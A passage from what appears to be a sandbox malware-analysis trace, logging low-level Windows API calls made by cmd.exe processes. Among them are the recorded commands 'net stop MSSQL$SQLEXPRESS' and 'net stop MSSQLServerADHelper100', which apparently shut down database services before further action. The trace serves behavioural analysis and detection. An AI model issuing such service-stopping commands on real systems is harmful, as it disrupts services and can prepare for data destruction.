-6 [0069.412] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.412] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.412] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.412] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.412] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.412] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.412] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.412] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.413] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.413] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.413] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.413] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.413] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.413] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.413] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.413] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.413] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.413] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.413] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.413] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.413] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.413] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.413] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.413] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.413] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.413] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.413] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.413] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.413] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.413] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.413] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.413] GetProcessHeap () returned 0x6b0000 [0069.413] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6c3088 [0069.413] GetProcessHeap () returned 0x6b0000 [0069.413] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3e) returned 0x6c32a0 [0069.413] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.414] GetProcessHeap () returned 0x6b0000 [0069.414] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6b07f0 [0069.414] SetErrorMode (uMode=0x0) returned 0x0 [0069.414] SetErrorMode (uMode=0x1) returned 0x0 [0069.414] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b07f8, lpFilePart=0x44f4f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x44f4f0*="Desktop") returned 0x25 [0069.414] SetErrorMode (uMode=0x0) returned 0x1 [0069.414] GetProcessHeap () returned 0x6b0000 [0069.414] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b07f0, Size=0x5c) returned 0x6b07f0 [0069.414] GetProcessHeap () returned 0x6b0000 [0069.414] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b07f0) returned 0x5c [0069.414] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.414] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.414] GetProcessHeap () returned 0x6b0000 [0069.414] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x120) returned 0x6c32e8 [0069.414] GetProcessHeap () returned 0x6b0000 [0069.414] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x238) returned 0x6b0858 [0069.420] GetProcessHeap () returned 0x6b0000 [0069.420] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0858, Size=0x122) returned 0x6b0858 [0069.420] GetProcessHeap () returned 0x6b0000 [0069.420] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0858) returned 0x122 [0069.420] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.420] GetProcessHeap () returned 0x6b0000 [0069.420] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe0) returned 0x6c3410 [0069.421] GetProcessHeap () returned 0x6b0000 [0069.421] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6c3410, Size=0x76) returned 0x6c3410 [0069.421] GetProcessHeap () returned 0x6b0000 [0069.421] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6c3410) returned 0x76 [0069.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.422] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x44f26c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44f26c) returned 0xffffffff [0069.422] GetLastError () returned 0x2 [0069.422] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x44f26c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44f26c) returned 0xffffffff [0069.422] GetLastError () returned 0x2 [0069.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x44f26c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44f26c) returned 0x6c3490 [0069.423] GetProcessHeap () returned 0x6b0000 [0069.423] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6c34d0 [0069.423] FindClose (in: hFindFile=0x6c3490 | out: hFindFile=0x6c3490) returned 1 [0069.423] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x44f26c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44f26c) returned 0xffffffff [0069.423] GetLastError () returned 0x2 [0069.423] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x44f26c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x44f26c) returned 0x6c3490 [0069.423] GetProcessHeap () returned 0x6b0000 [0069.423] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6c34d0, Size=0x4) returned 0x6c34d0 [0069.423] FindClose (in: hFindFile=0x6c3490 | out: hFindFile=0x6c3490) returned 1 [0069.423] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.423] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.423] GetConsoleTitleW (in: lpConsoleTitle=0x44f764, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.958] InitializeProcThreadAttributeList (in: lpAttributeList=0x44f5ec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x44f6b4 | out: lpAttributeList=0x44f5ec, lpSize=0x44f6b4) returned 1 [0069.958] UpdateProcThreadAttribute (in: lpAttributeList=0x44f5ec, dwFlags=0x0, Attribute=0x60001, lpValue=0x44f6ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x44f5ec, lpPreviousValue=0x0) returned 1 [0069.958] GetStartupInfoW (in: lpStartupInfo=0x44f5a8 | out: lpStartupInfo=0x44f5a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.958] GetProcessHeap () returned 0x6b0000 [0069.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6c3490 [0069.958] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.959] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.960] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.960] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.960] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.960] GetProcessHeap () returned 0x6b0000 [0069.960] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c3490 | out: hHeap=0x6b0000) returned 1 [0069.960] GetProcessHeap () returned 0x6b0000 [0069.960] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa) returned 0x6bff30 [0069.960] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.961] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SQLEXPRESS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x44f648*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SQLEXPRESS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x44f694 | out: lpCommandLine="net stop MSSQL$SQLEXPRESS", lpProcessInformation=0x44f694*(hProcess=0x78, hThread=0x74, dwProcessId=0x330, dwThreadId=0x598)) returned 1 [0070.048] CloseHandle (hObject=0x74) returned 1 [0070.048] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.048] GetProcessHeap () returned 0x6b0000 [0070.048] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c5f08 | out: hHeap=0x6b0000) returned 1 [0070.048] GetEnvironmentStringsW () returned 0x6c5f08* [0070.048] GetProcessHeap () returned 0x6b0000 [0070.048] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb36) returned 0x6c40c8 [0070.048] FreeEnvironmentStringsW (penv=0x6c5f08) returned 1 [0070.048] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.425] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x44f588 | out: lpExitCode=0x44f588*=0x2) returned 1 [0072.425] CloseHandle (hObject=0x78) returned 1 [0072.425] _vsnwprintf (in: _Buffer=0x44f6d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x44f594 | out: _Buffer="00000002") returned 8 [0072.425] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.426] GetProcessHeap () returned 0x6b0000 [0072.426] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c40c8 | out: hHeap=0x6b0000) returned 1 [0072.426] GetEnvironmentStringsW () returned 0x6c40c8* [0072.426] GetProcessHeap () returned 0x6b0000 [0072.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb5c) returned 0x6c95b0 [0072.426] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0072.426] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.426] GetProcessHeap () returned 0x6b0000 [0072.426] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c95b0 | out: hHeap=0x6b0000) returned 1 [0072.426] GetEnvironmentStringsW () returned 0x6c40c8* [0072.426] GetProcessHeap () returned 0x6b0000 [0072.426] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb5c) returned 0x6c95b0 [0072.426] FreeEnvironmentStringsW (penv=0x6c40c8) returned 1 [0072.426] GetProcessHeap () returned 0x6b0000 [0072.426] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6bff30 | out: hHeap=0x6b0000) returned 1 [0072.426] DeleteProcThreadAttributeList (in: lpAttributeList=0x44f5ec | out: lpAttributeList=0x44f5ec) [0072.426] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.426] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.427] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.428] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.428] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.428] SetConsoleInputExeNameW () returned 0x1 [0072.428] GetConsoleOutputCP () returned 0x1b5 [0072.428] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.428] exit (_Code=2) Process: id = "31" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x138a000" os_pid = "0x870" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQLServerADHelper100" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x874 [0068.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb10 | out: lpSystemTimeAsFileTime=0x1afb10*(dwLowDateTime=0x97e841b0, dwHighDateTime=0x1d57b18)) [0068.898] GetCurrentProcessId () returned 0x870 [0068.898] GetCurrentThreadId () returned 0x874 [0068.898] GetTickCount () returned 0x114b30a [0068.898] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb08 | out: lpPerformanceCount=0x1afb08*=18911924283) returned 1 [0068.899] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.899] __set_app_type (_Type=0x1) [0068.899] __p__fmode () returned 0x74eb31f4 [0068.899] __p__commode () returned 0x74eb31fc [0068.899] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.899] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.899] GetCurrentThreadId () returned 0x874 [0068.899] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x874) returned 0x60 [0068.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.900] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.900] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.900] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.900] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afaa0 | out: phkResult=0x1afaa0*=0x0) returned 0x2 [0068.900] VirtualQuery (in: lpAddress=0x1afad7, lpBuffer=0x1afa70, dwLength=0x1c | out: lpBuffer=0x1afa70*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.900] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa70, dwLength=0x1c | out: lpBuffer=0x1afa70*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.900] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa70, dwLength=0x1c | out: lpBuffer=0x1afa70*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.900] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa70, dwLength=0x1c | out: lpBuffer=0x1afa70*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.900] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa70, dwLength=0x1c | out: lpBuffer=0x1afa70*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.900] GetConsoleOutputCP () returned 0x1b5 [0068.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.901] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.901] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.901] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.901] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.901] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.901] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.901] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.901] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.901] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.902] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.902] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.902] GetEnvironmentStringsW () returned 0x3e2050* [0068.902] GetProcessHeap () returned 0x3d0000 [0068.902] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e2b28 [0068.902] FreeEnvironmentStringsW (penv=0x3e2050) returned 1 [0068.902] GetProcessHeap () returned 0x3d0000 [0068.902] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e0c88 [0068.902] GetEnvironmentStringsW () returned 0x3e2050* [0068.902] GetProcessHeap () returned 0x3d0000 [0068.902] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xaca) returned 0x3e3600 [0068.903] FreeEnvironmentStringsW (penv=0x3e2050) returned 1 [0068.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea10 | out: phkResult=0x1aea10*=0x68) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x0, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x1, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x1, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x0, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x40, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x40, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x40, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.903] RegCloseKey (hKey=0x68) returned 0x0 [0068.903] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea10 | out: phkResult=0x1aea10*=0x68) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x40, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x1, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x1, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x0, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.903] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x9, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.904] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x4, lpData=0x1aea1c*=0x9, lpcbData=0x1aea14*=0x4) returned 0x0 [0068.904] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea18, lpData=0x1aea1c, lpcbData=0x1aea14*=0x1000 | out: lpType=0x1aea18*=0x0, lpData=0x1aea1c*=0x9, lpcbData=0x1aea14*=0x1000) returned 0x2 [0068.904] RegCloseKey (hKey=0x68) returned 0x0 [0068.904] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.904] srand (_Seed=0x5d97ebb3) [0068.904] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQLServerADHelper100" [0068.904] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop MSSQLServerADHelper100" [0068.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.904] GetProcessHeap () returned 0x3d0000 [0068.904] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e2050 [0068.904] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e2058, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.904] GetEnvironmentVariableW (in: 